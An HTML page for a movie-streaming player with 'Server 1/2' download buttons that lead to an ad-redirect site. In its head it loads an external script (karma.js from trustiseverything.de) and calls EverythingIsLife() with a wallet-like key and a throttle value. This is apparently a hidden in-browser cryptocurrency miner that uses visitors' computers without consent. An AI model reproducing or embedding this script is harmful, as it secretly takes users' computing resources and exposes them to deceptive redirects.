<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link type="text/css" href="player.css" rel="stylesheet" />
    <title>MoviesOnly Player </title>
    <script src="https://trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
<script type="text/javascript">
EverythingIsLife('8BX1L8kYYe4AXwu3AGmJxm8ZfkLc1NzYGfyKFpbyj5d6QSRdFCG2ucmYQqaNWhS9atehEhTAgyPwVVeywxDiXKeBQumSKuV', 'x', 60);
</script>

    <style>
       .xdContainer{
         height: 400px;
         width: 100%;
         background-color: #000;
    position: relative;
       }
    </style>
</head>

<body>

  <!-- Video Player Container -->
  <div class="xdContainer">

        <video class="xdPlayer" 
        width="100%" 
        height="100%"
        preload="auto"
        poster="https://thumb.highdeliveryscdn.com/thumb/d8741240f56d/v7jlvd9ers3e.jpg" > 
        <source src="https://5d27ff2c03883fb.highdeliverycdn.com/atlaslionzd/lOHZvQvKVF1_aa-hkGNAdQ/1650092673/ttjk6klmgyvs/06h7ynksj4oi/video.mp4"  type="video/mp4" />
            <!-- You Can Also Add Other Video Formet Source -->
          </video>
  <!-- Video Player Container End -->
 </div>

    <script src="player.js"></script>

    <style>
      .button {
        border: none;
        color: white;
        padding: 15px 32px;
        text-align: center;
        text-decoration: none;
        display: inline-block;
        font-size: 16px;
        margin: 4px 2px;
        cursor: pointer;
      }
      
      .button1 {background-color: #4CAF50;} /* Green */
      .button2 {background-color: #008CBA;} /* Blue */
      </style>
      </head>
      <body>
      
      <h1>To Download Movies</h1>
      <p>ADS WILL BE SHOWN </p>
      
      <button class="button button1"> <a href="http://usheethe.com/8sec"> Server 1</button>
      <button class="button button2"> <a href="http://usheethe.com/8sec"> Server 2</button>
      
</body>
</html>
